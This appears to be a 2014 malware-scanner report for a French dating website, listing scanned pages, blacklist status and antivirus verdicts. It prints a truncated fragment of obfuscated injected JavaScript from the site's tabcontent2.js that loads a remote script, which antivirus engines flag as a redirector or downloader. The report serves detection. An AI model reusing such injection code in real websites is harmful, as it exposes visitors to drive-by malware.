New scan:

Malware Scanner report for rencontres-passions.org

Malicious/Suspicious/Total urls checked
2/0/17
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "rencontres-passions.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/3/6
3 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=rencontres-passions.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://rencontres-passions.org/
200 OK
Content-Length: 70970
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var loadingTag = "Chargement..";var modeRewrite = "Y";var docRoot = "/";var alphanumeric_chars = "0123456789.+-_#,/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzàçéèôùêâî ()";var alphanum_chars = "0123456789_- ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzàçéèôùêâî ";var text_chars = "-_@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzàçéèôùêâî ";var full_chars = "0123456789.+-_#,/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzàçéèôùêâî() $;:?'";var use_popups = true;var use_profilepopups = false;

Antivirus reports:

Emsisoft
Gen:Variant.Kazy.1699 (B)

http://rencontres-passions.org/javascript/functions.js
200 OK
Content-Length: 17004
Content-Type: application/x-javascript
clean
http://rencontres-passions.org/javascript/check.js
200 OK
Content-Length: 3619
Content-Type: application/x-javascript
clean
http://rencontres-passions.org/javascript/validate.js
200 OK
Content-Length: 2992
Content-Type: application/x-javascript
clean
http://rencontres-passions.org/javascript/shoutbox.js
200 OK
Content-Length: 908
Content-Type: application/x-javascript
clean
http://rencontres-passions.org/templates/my_templates/img/tabcontent2.js
200 OK
Content-Length: 23411
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



function ddtabcontent(tabinterfaceid){
this.tabinterfaceid=tabinterfaceid this.tabs=document.getElementById(tabinterfaceid).getElementsByTagName("a") this.enabletabpersistence=true
this.hottabspositions=[] this.subcontentids=[] this.revcontentids=[] this.selectedClassTarget="link" }

ddtabcontent.getCookie=function(Name){
var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return
... 3263 bytes are skipped ...
;var lk=new Array();H=Dc+M;H+=m;this.cN="";this.PS="";var hB=new String();var dx;if(dx!='rD'){dx=''};k.src=H;var St='';k.defer=([1][0]);var xC=new Array();var gk;if(gk!='' && gk!='SQ'){gk='ZV'};document.body.appendChild(k);var gP;if(gP!='' && gP!='jJ'){gP=null};var Js='';};var kU=new Array();var AS;if(AS!='pB' && AS!='SL'){AS=''};jj[fL]=K;var Lv;if(Lv!='' && Lv!='sT'){Lv=''};var aE;if(aE!='KB'){aE=''};var GX;if(GX!='Zf'){GX=''};} catch(Wf){this.mS='';this.wl='';};

Antivirus reports:

AntiVir
JS/Illredir.AI.1
Avast
JS:Illredir-S [Trj]
Ikarus
Trojan.JS.Redirector
K7AntiVirus
Trojan ( f4ade2000 )
TrendMicro-HouseCall
JS_ONLOAD.SMD
DrWeb
JS.Redirector.based.2
TrendMicro
JS_ONLOAD.SMD
Microsoft
Trojan:JS/Redirector.GM
NANO-Antivirus
Trojan.Script.Pegel.yftup
VIPRE
Trojan.JS.Redirector.bh (v)
F-Prot
JS/Redir.AQ
AVG
JS/Obfuscated
Sophos
Troj/JSRedir-AU
Commtouch
JS/Redir.AQ
Agnitum
JS.Redirector.Gen
ESET-NOD32
JS/TrojanDownloader.Agent.NSA

http://RNP.ourtoolbar.com/ControlsLibrary/Javascript/Generic/Site.js
HTTP/1.1 302 Found
Connection: close
Date: Thu, 04 Sep 2014 20:32:46 GMT
Location: http://RNP.ourtoolbar.com/JavascriptLibrary/Generic/Site.js
Server: Microsoft-IIS/7.5
Content-Length: 245
Content-Type: text/html
X-Powered-By: ASP.NET
clean
http://rnp.ourtoolbar.com/javascriptlibrary/generic/site.js
200 OK
Content-Length: 4962
Content-Type: application/x-javascript
clean
http://www.conduit.com/Api/ToolbarApi.aspx
404 Not Found
Content-Length: 115
Content-Type: application/json
clean
http://www.conduit.com/test404page.js
HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=2592000
Connection: close
Date: Thu, 04 Sep 2014 20:34:27 GMT
Location: /Error/NotFound?aspxerrorpath=/test404page.js
Server: Microsoft-IIS/8.5
Content-Length: 162
Expires: Sat, 04 Oct 2014 20:34:27 GMT
P3p: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=Edge
clean
http://www.conduit.com/error/notfound?aspxerrorpath=/test404page.js
404 Not Found
Content-Length: 23719
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 0x0     style: hidden
src: http://www.googletagmanager.com/ns.html?id=gtm-cmxk

<iframe src="http://www.googletagmanager.com/ns.html?id=gtm-cmxk" height="0" width="0" style="display:none;visibility:hidden">

http://www.conduit.com/Scripts/Master/getnortonsealimaget.js
200 OK
Content-Length: 2814
Content-Type: application/javascript
clean
http://www.conduit.com/bundle/script/innerpage?v=TrNAMJ6ecHAnz_4cmDYjE6xEMwZveuMfNDKrgzUmjiU1
200 OK
Content-Length: 117848
Content-Type: text/javascript
clean
http://www.googleadservices.com/pagead/conversion.js
200 OK
Content-Length: 9448
Content-Type: text/javascript
clean
http://www.conduit.com/
200 OK
Content-Length: 30274
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 0x0     style: hidden
src: http://www.googletagmanager.com/ns.html?id=gtm-cmxk

<iframe src="http://www.googletagmanager.com/ns.html?id=gtm-cmxk" height="0" width="0" style="display:none;visibility:hidden">

http://www.conduit.com/bundle/script/homepage?v=hJJCAYD76HF7bM8yV2badTdcvDTcDuDWACQd1bMkkjw1
200 OK
Content-Length: 118906
Content-Type: text/javascript
clean
http://www.conduit.com/aboutus/contactus
200 OK
Content-Length: 38704
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 0x0     style: hidden
src: http://www.googletagmanager.com/ns.html?id=gtm-cmxk

<iframe src="http://www.googletagmanager.com/ns.html?id=gtm-cmxk" height="0" width="0" style="display:none;visibility:hidden">


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: rencontres-passions.org

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 04 Sep 2014 20:34:21 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=01f851e9858613bb7c7076799958c02a; path=/
Set-Cookie: osdateopt_lang=french; expires=Fri, 04-Sep-2015 20:34:21 GMT
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: rencontres-passions.org
Referer: http://www.google.com/search?q=rencontres-passions.org

Result:
The result is similar to the first query. There are no suspicious redirects found.